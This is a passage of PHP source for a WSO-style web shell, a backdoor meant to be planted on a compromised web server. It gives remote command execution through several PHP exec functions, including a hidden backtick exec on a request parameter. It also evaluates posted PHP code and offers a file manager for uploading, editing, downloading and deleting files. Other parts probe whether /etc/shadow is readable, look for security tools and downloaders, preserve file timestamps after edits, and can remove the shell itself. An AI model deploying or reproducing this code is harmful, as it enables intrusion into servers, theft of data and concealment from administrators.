            $cwd_links .= $path[$j].'/';
        $cwd_links .= "\")'>".$path[$i]."/</a>";
    }
    
    $charsets = array('UTF-8','Windows-1251','KOI8-R','KOI8-U','cp866');
    $opt_charsets = '';
    foreach($charsets as $item) {
        $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
    }
    
    $m = array('Sec Info'=>'SecInfo','Files'=>'FilesMan','Exec'=>'Console','Sql'=>'Sql','PHP Tools'=>'phptools','LFI'=>'lfiscan','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');
    if(!empty($GLOBALS['password'])) {
        $m['Logout'] = 'Logout';
    }
    $m['Self remove'] = 'SelfRemove';
    
    $menu = '';
    foreach($m as $k =>$v) {
        $menu .= '<th width="'.(int)(100/count($m)).'%">[<a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a>]</th>';
    }
    
    $drives = "";
    if(isset($_REQUEST['I'])) {
        @print(`{$_REQUEST['I']}`);
    }
    
    if($GLOBALS['os'] == 'win') {
        foreach(range('c','z') as $drive) {
            if(is_dir($drive.':\\')) {
                $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
            }
        }
    }
    
    echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:'.($GLOBALS['os'] == 'win'?'<br>Drives:':'') .'</span></td>'
    .'<td><nobr>'.substr(@php_uname(),0,120) .' </nobr><br>'.$uid .' ( '.$user .' ) <span>Group:</span> '.$gid .' ( '.$group .' )<br>'.@phpversion() .' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#00bb00><b>OFF</b></font>')
    .' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s') .'<br>'.wsoViewSize($totalSpace) .' <span>Free:</span> '.wsoViewSize($freeSpace) .' ('.(int) ($freeSpace/$totalSpace*100) .'%)<br>'.$cwd_links .' '.wsoPermsColor($GLOBALS['cwd']) .' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'] .'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives .'</td>'
    .'<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets .'</optgroup></select><br><span>Server IP:</span><br>'.@$_SERVER["SERVER_ADDR"] .'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'] .'</nobr></td></tr></table>'
    .'<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>'.$menu .'</tr></table><div style="margin:5">';
}

function wsoFooter() {
    $is_writable = is_writable($GLOBALS['cwd'])?" <font color='#25ff00'>(Writeable)</font>":" <font color=red>(Not writable)</font>";
    echo "
    </div>
    <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'>
        <tr>
            <td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='".htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td>
            <td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
        </tr><tr>
            <td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
            <td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
        </tr><tr>
            <td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
            <td><form method='post' ENCTYPE='multipart/form-data'>
            <input type=hidden name=a value='FilesMan'>
            <input type=hidden name=c value='".$GLOBALS['cwd'] ."'>
            <input type=hidden name=p1 value='uploadFile'>
            <input type=hidden name=charset value='".(isset($_POST['charset'])?$_POST['charset']:'') ."'>
            <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br></td></tr></table></div></body></html>";
}

if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'],'posix_getpwuid')===false)) {
    function posix_getpwuid($p) {return false;}
}

if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'],'posix_getgrgid')===false)) {
    function posix_getgrgid($p) {return false;}
}

function wsoEx($in) {
    $out = '';
    if (function_exists('exec')) {
        @exec($in,$out);
        $out = @join("\n",$out);
    } elseif (function_exists('passthru')) {
        ob_start();
        @passthru($in);
        $out = ob_get_clean();
    } elseif (function_exists('system')) {
        ob_start();
        @system($in);
        $out = ob_get_clean();
    } elseif (function_exists('shell_exec')) {
        $out = shell_exec($in);
    } elseif (is_resource($f = @popen($in,"r"))) {
        $out = "";
        while(!@feof($f))
            $out .= fread($f,1024);
        pclose($f);
    }
    return $out;
}

function wsoViewSize($s) {
    if($s >= 1073741824)
        return sprintf('%1.2f',$s / 1073741824 ).' GB';
    elseif($s >= 1048576)
        return sprintf('%1.2f',$s / 1048576 ) .' MB';
    elseif($s >= 1024)
        return sprintf('%1.2f',$s / 1024 ) .' KB';
    else
        return $s .' B';
}

function wsoPerms($p) {
    if (($p & 0xC000) == 0xC000)$i = 's';
    elseif (($p & 0xA000) == 0xA000)$i = 'l';
    elseif (($p & 0x8000) == 0x8000)$i = '-';
    elseif (($p & 0x6000) == 0x6000)$i = 'b';
    elseif (($p & 0x4000) == 0x4000)$i = 'd';
    elseif (($p & 0x2000) == 0x2000)$i = 'c';
    elseif (($p & 0x1000) == 0x1000)$i = 'p';
    else $i = 'u';
    $i .= (($p & 0x0100) ?'r': '-');
    $i .= (($p & 0x0080) ?'w': '-');
    $i .= (($p & 0x0040) ?(($p & 0x0800) ?'s': 'x') : (($p & 0x0800) ?'S': '-'));
    $i .= (($p & 0x0020) ?'r': '-');
    $i .= (($p & 0x0010) ?'w': '-');
    $i .= (($p & 0x0008) ?(($p & 0x0400) ?'s': 'x') : (($p & 0x0400) ?'S': '-'));
    $i .= (($p & 0x0004) ?'r': '-');
    $i .= (($p & 0x0002) ?'w': '-');
    $i .= (($p & 0x0001) ?(($p & 0x0200) ?'t': 'x') : (($p & 0x0200) ?'T': '-'));
    return $i;
}

function wsoPermsColor($f) {
    if (!@is_readable($f))
        return '<font color=#FF0000>'.wsoPerms(@fileperms($f)) .'</font>';
    elseif (!@is_writable($f))
        return '<font color=white>'.wsoPerms(@fileperms($f)) .'</font>';
    else
        return '<font color=#00BB00>'.wsoPerms(@fileperms($f)) .'</font>';
}

if(!function_exists("scandir")) {
    function scandir($dir) {
        $dh  = opendir($dir);
        while (false !== ($filename = readdir($dh)))
            $files[] = $filename;
        return $files;
    }
}

function wsoWhich($p) {
    $path = wsoEx('which '.$p);
    if(!empty($path))
        return $path;
    return false;
}

function actionSecInfo() {
    wsoHeader();
    echo '<h1>Server security information</h1><div class=content>';
    
    function wsoSecParam($n,$v) {
        $v = trim($v);
        if($v) {
            echo '<span>'.$n .': </span>';
            if(strpos($v,"\n") === false)
                echo $v .'<br>';
            else
                echo '<pre class=ml1>'.$v .'</pre>';
        }
    }
    
    wsoSecParam('Server software',@getenv('SERVER_SOFTWARE'));
    if(function_exists('apache_get_modules'))
        wsoSecParam('Loaded Apache modules',implode(', ',apache_get_modules()));
    wsoSecParam('Disabled PHP Functions',$GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
    wsoSecParam('Open base dir',@ini_get('open_basedir'));
    wsoSecParam('Safe mode exec dir',@ini_get('safe_mode_exec_dir'));
    wsoSecParam('Safe mode include dir',@ini_get('safe_mode_include_dir'));
    wsoSecParam('cURL support',function_exists('curl_version')?'enabled':'no');
    
    $temp=array();
    if(function_exists('mysqli_connect'))
        $temp[] = "MySQL";
    if(function_exists('pg_connect'))
        $temp[] = "PostgreSQL";
    if(function_exists('oci_connect'))
        $temp[] = "Oracle";
        
    wsoSecParam('Supported databases',implode(', ',$temp));
    echo '<br>';
    
    if($GLOBALS['os'] == 'nix') {
        wsoSecParam('Readable /etc/passwd',@is_readable('/etc/passwd')?"yes":'no');
        wsoSecParam('Readable /etc/shadow',@is_readable('/etc/shadow')?"yes":'no');
        wsoSecParam('OS version',@file_get_contents('/proc/version'));
        wsoSecParam('Distr name',@file_get_contents('/etc/issue.net'));
        
        if(!$GLOBALS['safe_mode']) {
            $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
            $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
            $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
            echo '<br>';
            
            $temp=array();
            foreach ($userful as $item)
                if(wsoWhich($item))
                    $temp[] = $item;
            wsoSecParam('Userful',implode(', ',$temp));
            
            $temp=array();
            foreach ($danger as $item)
                if(wsoWhich($item))
                    $temp[] = $item;
            wsoSecParam('Danger',implode(', ',$temp));
            
            $temp=array();
            foreach ($downloaders as $item)
                if(wsoWhich($item))
                    $temp[] = $item;
            wsoSecParam('Downloaders',implode(', ',$temp));
            echo '<br/>';
            
            wsoSecParam('HDD space',wsoEx('df -h'));
            wsoSecParam('Hosts',@file_get_contents('/etc/hosts'));
        }
    } else {
        wsoSecParam('OS Version',wsoEx('ver'));
        wsoSecParam('Account Settings',wsoEx('net accounts'));
        wsoSecParam('User Accounts',wsoEx('net user'));
    }
    echo '</div>';
    wsoFooter();
}

function actionFilesMan() {
    wsoHeader();
    echo '<h1>File manager</h1><div class=content>';
    
    if(!empty($_POST['p1'])) {
        switch($_POST['p1']) {
            case 'uploadFile':
                if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) {
                    echo "Can't upload file!";
                }
                break;
            case 'mkdir':
                if(!@mkdir($_POST['p2'])) {
                    echo "Can't create new dir";
                }
                break;
            case 'delete':
                function deleteDir($path) {
                    $path = (substr($path,-1)=='/') ? $path : $path.'/';
                    $dh  = opendir($path);
                    while (($item = readdir($dh)) !== false) {
                        $item = $path.$item;
                        if ((basename($item) == "..") || (basename($item) == ".")) continue;
                        $type = filetype($item);
                        if ($type == "dir")
                            deleteDir($item);
                        else
                            @unlink($item);
                    }
                    closedir($dh);
                    @rmdir($path);
                }
                if(is_array(@$_POST['f'])) {
                    foreach($_POST['f'] as $f) {
                        if($f == '..') continue;
                        $f = urldecode($f);
                        if(is_dir($f))
                            deleteDir($f);
                        else
                            @unlink($f);
                    }
                }
                break;
        }
    }
    
    $dirContent = @scandir($GLOBALS['cwd']);
    if($dirContent === false) {
        echo 'Can\'t open this folder!';
        wsoFooter();
        return;
    }
    
    echo "<script>
        function sa() {
            for(i=0;i<d.files.elements.length;i++)
                if(d.files.elements[i].type == 'checkbox')
                    d.files.elements[i].checked = d.files.elements[0].checked;
        }
    </script>
    <table width='100%' class='main' cellspacing='0' cellpadding='2'>
    <form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th>Name</th><th>Size</th><th>Modify</th><th>Permissions</th><th>Actions</th></tr>";
    
    $dirs = $files = array();
    $n = count($dirContent);
    for($i=0;$i<$n;$i++) {
        $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
        $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
        $tmp = array(
            'name'=>$dirContent[$i],
            'path'=>$GLOBALS['cwd'].$dirContent[$i],
            'modify'=>date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'] .$dirContent[$i])),
            'perms'=>wsoPermsColor($GLOBALS['cwd'] .$dirContent[$i]),
            'size'=>@filesize($GLOBALS['cwd'].$dirContent[$i]),
            'owner'=>$ow['name']?$ow['name']:@fileowner($dirContent[$i]),
            'group'=>$gr['name']?$gr['name']:@filegroup($dirContent[$i])
        );
        
        if(@is_file($GLOBALS['cwd'] .$dirContent[$i])) {
            $files[] = array_merge($tmp,array('type'=>'file'));
        } elseif(@is_dir($GLOBALS['cwd'] .$dirContent[$i]) && ($dirContent[$i] != ".")) {
            $dirs[] = array_merge($tmp,array('type'=>'dir'));
        }
    }
    
    $files = array_merge($dirs, $files);
    $l = 0;
    foreach($files as $f) {
        echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['perms'].'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> '.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
        $l = $l?0:1;
    }
    
    echo "<tr><td colspan=6>
        <input type=hidden name=a value='FilesMan'>
        <input type=hidden name=c value='".htmlspecialchars($GLOBALS['cwd'])."'>
        <input type=hidden name=charset value='".(isset($_POST['charset'])?$_POST['charset']:'')."'>
        <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
    if(class_exists('ZipArchive'))
        echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
    echo "<option value='tar'>Compress (tar.gz)</option>";
    echo "</select>&nbsp;<input type='submit' value='>>'></td></tr></form></table></div>";
    wsoFooter();
}

function actionFilesTools() {
    if(isset($_POST['p1'])) {
        $_POST['p1'] = urldecode($_POST['p1']);
    }
    
    if(@$_POST['p2']=='download') {
        if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
            header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
            if (function_exists("mime_content_type")) {
                $type = @mime_content_type($_POST['p1']);
                header("Content-Type: ".$type);
            } else {
                header("Content-Type: application/octet-stream");
            }
            $fp = @fopen($_POST['p1'],"r");
            if($fp) {
                while(!@feof($fp))
                    echo @fread($fp,1024);
                fclose($fp);
            }
            exit;
        }
    }
    
    wsoHeader();
    echo '<h1>File tools</h1><div class=content>';
    
    if(!file_exists(@$_POST['p1'])) {
        echo 'File not exists';
        wsoFooter();
        return;
    }
    
    $uid = @posix_getpwuid(@fileowner($_POST['p1']));
    if(!$uid) {
        $uid['name'] = @fileowner($_POST['p1']);
        $gid['name'] = @filegroup($_POST['p1']);
    } else {
        $gid = @posix_getgrgid(@filegroup($_POST['p1']));
    }
    
    echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.wsoPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
    echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
    
    if(empty($_POST['p2'])) {
        $_POST['p2'] = 'view';
    }
    
    if(is_file($_POST['p1'])) {
        $m = array('View','Highlight','Download','Hexdump','Edit','Chmod','Rename','Touch');
    } else {
        $m = array('Chmod','Rename','Touch');
    }
    
    foreach($m as $v) {
        echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
    }
    
    echo '<br><br>';
    
    switch($_POST['p2']) {
        case 'view':
            echo '<pre class=ml1>';
            $fp = @fopen($_POST['p1'],'r');
            if($fp) {
                while(!@feof($fp))
                    echo htmlspecialchars(@fread($fp,1024));
                @fclose($fp);
            }
            echo '</pre>';
            break;
            
        case 'edit':
            if(!is_writable($_POST['p1'])) {
                echo 'File isn\'t writeable';
                break;
            }
            
            if(!empty($_POST['p3'])) {
                $time = @filemtime($_POST['p1']);
                $fp = @fopen($_POST['p1'],"w");
                if($fp) {
                    @fwrite($fp,$_POST['p3']);
                    @fclose($fp);
                    echo 'Saved!<br>';
                    @touch($_POST['p1'],$time,$time);
                }
            }
            
            echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>';
            $fp = @fopen($_POST['p1'],'r');
            if($fp) {
                while(!@feof($fp))
                    echo htmlspecialchars(@fread($fp,1024));
                @fclose($fp);
            }
            echo '</textarea><input type=submit value=">>"></form>';
            break;
    }
    
    echo '</div>';
    wsoFooter();
}

function actionConsole() {
    wsoHeader();
    echo '<h1>Console</h1><div class=content>';
    echo '<form name=cf onsubmit="g(\'Console\',null,this.cmd.value);return false;"><select name=alias>';
    
    foreach($GLOBALS['aliases'] as $n => $v) {
        if($v == '') {
            echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
            continue;
        }
        echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
    }
    
    echo '</select><input type=button onclick="g(\'Console\',null,d.cf.alias.value)" value=">>"><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
    
    if(!empty($_POST['p1'])) {
        if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
            if(@chdir($match[1])) {
                $GLOBALS['cwd'] = @getcwd();
            }
        }
        echo htmlspecialchars("$ ".$_POST['p1']."\n".wsoEx($_POST['p1']));
    }
    
    echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;"></td></tr></table>';
    echo '</form></div><script>d.cf.cmd.focus();</script>';
    wsoFooter();
}

function actionPhp() {
    wsoHeader();
    
    if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) {
        echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';
        ob_start();
        phpinfo();
        $tmp = ob_get_clean();
        $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
        $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
        echo str_replace('<h1','<h2',$tmp) .'</div><br>';
    }
    
    echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="g(\'Php\',null,this.code.value,\'\');return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px"></form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
    
    if(!empty($_POST['p1'])) {
        ob_start();
        eval($_POST['p1']);
        echo htmlspecialchars(ob_get_clean());
    }
    
    echo '</pre></div>';
    wsoFooter();
}

function actionStringTools() {
    wsoHeader();
    echo '<h1>String conversions</h1><div class=content>';
    
    $stringTools = array(
        'Base64 encode'=>'base64_encode',
        'Base64 decode'=>'base64_decode',
        'Url encode'=>'urlencode',
        'Url decode'=>'urldecode',
        'md5 hash'=>'md5',
        'sha1 hash'=>'sha1',
        'crypt'=>'crypt',
        'CRC32'=>'crc32',
        'String to lower case'=>'strtolower',
        'String to upper case'=>'strtoupper',
        'Htmlspecialchars'=>'htmlspecialchars',
        'String length'=>'strlen',
    );
    
    echo "<form name='toolsForm' onSubmit='g(null,null,this.selectTool.value,this.input.value); return false;'><select name='selectTool'>";
    foreach($stringTools as $k => $v) {
        echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
    }
    echo "</select><input type='submit' value='>>'/><br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
    
    if(!empty($_POST['p1'])) {
        if(function_exists($_POST['p1'])) {
            echo htmlspecialchars($_POST['p1']($_POST['p2']));
        }
    }
    
    echo"</pre></div>";
    wsoFooter();
}

function actionLogout() {
    session_destroy();
    die('bye!');
}

function actionSelfRemove() {
    if($_POST['p1'] == 'yes') {
        if(@unlink(__FILE__)) {
            die('Shell has been removed');
        } else {
            echo 'unlink error!';
        }
    }
    
    if($_POST['p1'] != 'yes') {
        wsoHeader();
    }
    echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
    wsoFooter();
}

// Main execution
if(empty($_POST['a'])) {
    if(isset($default_action) && function_exists('action'.$default_action)) {
        $_POST['a'] = $default_action;
    } else {
        $_POST['a'] = 'SecInfo';
    }
}

if(!empty($_POST['a']) && function_exists('action'.$_POST['a'])) {
    call_user_func('action'.$_POST['a']);
}

exit;
?>